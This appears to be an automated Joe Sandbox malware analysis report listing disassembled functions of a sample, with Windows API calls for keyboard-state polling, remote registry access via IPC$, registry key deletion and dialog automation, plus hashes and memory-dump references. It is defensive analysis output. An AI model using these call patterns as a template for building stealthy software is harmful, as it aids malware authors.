                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                  • API String ID: 2734957052-4033151799
                                                  • Opcode ID: ec1684d7cba7f245f9a78fc6228634b264b18dd2fbe95ba153ae1761a05066ed
                                                  • Instruction ID: 6ec19cc07b534e8c79ea806bf6d9c526b091c3eaf9f4fcd3567af37d275a1952
                                                  • Opcode Fuzzy Hash: ec1684d7cba7f245f9a78fc6228634b264b18dd2fbe95ba153ae1761a05066ed
                                                  • Instruction Fuzzy Hash: 87318C71941129BBDB308B55EC88EFFBB7EEF45760F040165A906E2240DA709E86DAE0
                                                  Function 005FE6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • timeGetTime.WINMM ref: 005FE6B4
                                                    • Part of subcall function 005AE551: timeGetTime.WINMM(?,?,005FE6D4), ref: 005AE555
                                                  • Sleep.KERNEL32(0000000A), ref: 005FE6E1
                                                  • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 005FE705
                                                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 005FE727
                                                  • SetActiveWindow.USER32 ref: 005FE746
                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 005FE754
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 005FE773
                                                  • Sleep.KERNEL32(000000FA), ref: 005FE77E
                                                  • IsWindow.USER32 ref: 005FE78A
                                                  • EndDialog.USER32(00000000), ref: 005FE79B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                  • String ID: BUTTON
                                                  • API String ID: 1194449130-3405671355
                                                  • Opcode ID: 1eed6e05fcac29509e65faf3017dd1c581b1dd2d23199d4062c5c5a369c85915
                                                  • Instruction ID: 25cb254a78e261f4751b9ac73de8195d2d905f2303743174e123e6d958f12e76
                                                  • Opcode Fuzzy Hash: 1eed6e05fcac29509e65faf3017dd1c581b1dd2d23199d4062c5c5a369c85915
                                                  • Instruction Fuzzy Hash: A521F670200A4AAFFB106F24EC9FA393F6BF755758F002425F602D11B1DBB59C519B20
                                                  Function 005FE9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 005FEA5D
                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 005FEA73
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 005FEA84
                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 005FEA96
                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 005FEAA7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: SendString$_wcslen
                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                  • API String ID: 2420728520-1007645807
                                                  • Opcode ID: 2da9a08bab6c240941a51289f3748adbac1216831238bc853f98fd6f5162abb8
                                                  • Instruction ID: b9eed99eb5fcbe691b6dd2672a763399319ca111c4e1f9579d3b8cb775dae32f
                                                  • Opcode Fuzzy Hash: 2da9a08bab6c240941a51289f3748adbac1216831238bc853f98fd6f5162abb8
                                                  • Instruction Fuzzy Hash: A2114F61A9021AB9DB20A7A5DC4EDFF6E7DFBD1F41F4105297951A20E1EAB00D09C5B0
                                                  Function 005A8BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 005A8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,005A8BE8,?,00000000,?,?,?,?,005A8BBA,00000000,?), ref: 005A8FC5
                                                  • DestroyWindow.USER32(?), ref: 005A8C81
                                                  • KillTimer.USER32(00000000,?,?,?,?,005A8BBA,00000000,?), ref: 005A8D1B
                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 005E6973
                                                  • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,005A8BBA,00000000,?), ref: 005E69A1
                                                  • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,005A8BBA,00000000,?), ref: 005E69B8
                                                  • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,005A8BBA,00000000), ref: 005E69D4
                                                  • DeleteObject.GDI32(00000000), ref: 005E69E6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                  • String ID:
                                                  • API String ID: 641708696-0
                                                  • Opcode ID: 3506c2f96a976fef173fbc767caeebb7dcaf0237277db33bffa419d025eaa4f7
                                                  • Instruction ID: fc191133e779ec3a9eaf4a55cb2c321f0753a71dffb097d06c96f86751412025
                                                  • Opcode Fuzzy Hash: 3506c2f96a976fef173fbc767caeebb7dcaf0237277db33bffa419d025eaa4f7
                                                  • Instruction Fuzzy Hash: A4619C30502A41DFCB399F15D968B3D7FF2FB523A2F185928E0829A560CB71AD91CF90
                                                  Function 005A9838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 005A9944: GetWindowLongW.USER32(?,000000EB), ref: 005A9952
                                                  • GetSysColor.USER32(0000000F), ref: 005A9862
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ColorLongWindow
                                                  • String ID:
                                                  • API String ID: 259745315-0
                                                  • Opcode ID: 03183eb76681610d85c35f795ee650d92727e765833faf2255a8be48e726e710
                                                  • Instruction ID: ee81525f3ed84b0f3109649374916e44df8e0d1643ca8c4671c0d10337414849
                                                  • Opcode Fuzzy Hash: 03183eb76681610d85c35f795ee650d92727e765833faf2255a8be48e726e710
                                                  • Instruction Fuzzy Hash: C9419E31104A65AFDB309F389C89BBE3FA6BB07330F144605F9A28B1E1C6399C52DB50
                                                  Function 005C8D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .[
                                                  • API String ID: 0-1428149938
                                                  • Opcode ID: c588b9fb0a7a2f9d4959cc73ddc378665d4dc476bd6f0ebb8b4986598e034230
                                                  • Instruction ID: 1522cb8490a9cd9a4ebfffa4b32740fbc8380e9a4ec5e996f4bfe5215709f3d5
                                                  • Opcode Fuzzy Hash: c588b9fb0a7a2f9d4959cc73ddc378665d4dc476bd6f0ebb8b4986598e034230
                                                  • Instruction Fuzzy Hash: 22C1BC79A0424AAFDB119FE8CC49FEDBFB5BF49310F08409DE815A7292C7749941CB61
                                                  Function 005F96E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,005DF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 005F9717
                                                  • LoadStringW.USER32(00000000,?,005DF7F8,00000001), ref: 005F9720
                                                    • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                                                  • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,005DF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 005F9742
                                                  • LoadStringW.USER32(00000000,?,005DF7F8,00000001), ref: 005F9745
                                                  • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 005F9866
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: HandleLoadModuleString$Message_wcslen
                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                  • API String ID: 747408836-2268648507
                                                  • Opcode ID: d2926793e07f6f910a32a29e280f59f89577894e2161415b266733522bb937e3
                                                  • Instruction ID: f349c2da16c6938a6165db1309959630d50822f7d762f5e3c603138ecde153d1
                                                  • Opcode Fuzzy Hash: d2926793e07f6f910a32a29e280f59f89577894e2161415b266733522bb937e3
                                                  • Instruction Fuzzy Hash: F841407280060AAACF04EBE4DD4AEFE7B79BF95340F504429F60572091EB755F48CB61
                                                  Function 005F06DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00596B57: _wcslen.LIBCMT ref: 00596B6A
                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 005F07A2
                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 005F07BE
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 005F07DA
                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 005F0804
                                                  • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 005F082C
                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 005F0837
                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 005F083C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                  • API String ID: 323675364-22481851
                                                  • Opcode ID: 18875ebe16bf74ed31227001e324c024ab77795c253b8d5802c2bfbf5a908521
                                                  • Instruction ID: 476ad12a9cddbbb0fbcf11c0b2e4544bd539728ccf8befff09d0944d66cf69e1
                                                  • Opcode Fuzzy Hash: 18875ebe16bf74ed31227001e324c024ab77795c253b8d5802c2bfbf5a908521
                                                  • Instruction Fuzzy Hash: 61411672C1022DABDF21EBA4DC99CEDBB79FF44350F144169E901A31A1EB349E04CBA0
                                                  Function 00613C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 00613C5C
                                                  • CoInitialize.OLE32(00000000), ref: 00613C8A
                                                  • CoUninitialize.OLE32 ref: 00613C94
                                                  • _wcslen.LIBCMT ref: 00613D2D
                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 00613DB1
                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 00613ED5
                                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00613F0E
                                                  • CoGetObject.OLE32(?,00000000,0062FB98,?), ref: 00613F2D
                                                  • SetErrorMode.KERNEL32(00000000), ref: 00613F40
                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00613FC4
                                                  • VariantClear.OLEAUT32(?), ref: 00613FD8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                  • String ID:
                                                  • API String ID: 429561992-0
                                                  • Opcode ID: 54a80523df534b8145cfa297ae57e1f6c3e1a4f169f6bd570cc29b3ca1d1cc38
                                                  • Instruction ID: 5d9acf5007d4b5721e38abbc17717a2f0abfb28d1ce03fe36af20e4310ef067b
                                                  • Opcode Fuzzy Hash: 54a80523df534b8145cfa297ae57e1f6c3e1a4f169f6bd570cc29b3ca1d1cc38
                                                  • Instruction Fuzzy Hash: 0DC123716083159FD700DF68C8849AABBEABF89744F04491DF98A9B350DB30ED46CB52
                                                  Function 00607A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CoInitialize.OLE32(00000000), ref: 00607AF3
                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00607B8F
                                                  • SHGetDesktopFolder.SHELL32(?), ref: 00607BA3
                                                  • CoCreateInstance.OLE32(0062FD08,00000000,00000001,00656E6C,?), ref: 00607BEF
                                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00607C74
                                                  • CoTaskMemFree.OLE32(?,?), ref: 00607CCC
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00607D57
                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00607D7A
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00607D81
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00607DD6
                                                  • CoUninitialize.OLE32 ref: 00607DDC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                  • String ID:
                                                  • API String ID: 2762341140-0
                                                  • Opcode ID: e471e9d721dce432d984ec8936c7d9649e2e4a10d53f94092c20a39c1e32f5fb
                                                  • Instruction ID: d9e4b3a8dc790798173ee3d661add477f85fd82766e0284d65f8df8f3d4cb6e0
                                                  • Opcode Fuzzy Hash: e471e9d721dce432d984ec8936c7d9649e2e4a10d53f94092c20a39c1e32f5fb
                                                  • Instruction Fuzzy Hash: EBC11C75A04509AFDB14DF64C888DAEBBFAFF48314B148499E815DB3A1D730EE45CB90
                                                  Function 0062541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00625504
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00625515
                                                  • CharNextW.USER32(00000158), ref: 00625544
                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00625585
                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0062559B
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006255AC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CharNext
                                                  • String ID:
                                                  • API String ID: 1350042424-0
                                                  • Opcode ID: 776d9bf2acf09e1d153ec17e87212b478647b95e757dcb9554d173d1cd088fe9
                                                  • Instruction ID: 767e8bfaa408f75aa9d4cbfc7d5d506954285e00eedd6ae81945e0bbde7fc91f
                                                  • Opcode Fuzzy Hash: 776d9bf2acf09e1d153ec17e87212b478647b95e757dcb9554d173d1cd088fe9
                                                  • Instruction Fuzzy Hash: 57617E30900A29EBDF309F54EC859FE7BBAEF05760F108145F926AB290D7748A81DF61
                                                  Function 005EFA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 005EFAAF
                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 005EFB08
                                                  • VariantInit.OLEAUT32(?), ref: 005EFB1A
                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 005EFB3A
                                                  • VariantCopy.OLEAUT32(?,?), ref: 005EFB8D
                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 005EFBA1
                                                  • VariantClear.OLEAUT32(?), ref: 005EFBB6
                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 005EFBC3
                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 005EFBCC
                                                  • VariantClear.OLEAUT32(?), ref: 005EFBDE
                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 005EFBE9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                  • String ID:
                                                  • API String ID: 2706829360-0
                                                  • Opcode ID: d5edd545e0ee8d9124ed38699aaa67aa2e6c8a699a62adf0017f990cc2826676
                                                  • Instruction ID: 19939ba0e0d8bb64f3e80e84d038123c9d2aea0689a1f56a9f6a25838434243f
                                                  • Opcode Fuzzy Hash: d5edd545e0ee8d9124ed38699aaa67aa2e6c8a699a62adf0017f990cc2826676
                                                  • Instruction Fuzzy Hash: E7414035A002199FCF14EF65CC58DAEBFB9FF48354F108069E945AB261DB30A946CFA0
                                                  Function 005F9C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetKeyboardState.USER32(?), ref: 005F9CA1
                                                  • GetAsyncKeyState.USER32(000000A0), ref: 005F9D22
                                                  • GetKeyState.USER32(000000A0), ref: 005F9D3D
                                                  • GetAsyncKeyState.USER32(000000A1), ref: 005F9D57
                                                  • GetKeyState.USER32(000000A1), ref: 005F9D6C
                                                  • GetAsyncKeyState.USER32(00000011), ref: 005F9D84
                                                  • GetKeyState.USER32(00000011), ref: 005F9D96
                                                  • GetAsyncKeyState.USER32(00000012), ref: 005F9DAE
                                                  • GetKeyState.USER32(00000012), ref: 005F9DC0
                                                  • GetAsyncKeyState.USER32(0000005B), ref: 005F9DD8
                                                  • GetKeyState.USER32(0000005B), ref: 005F9DEA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
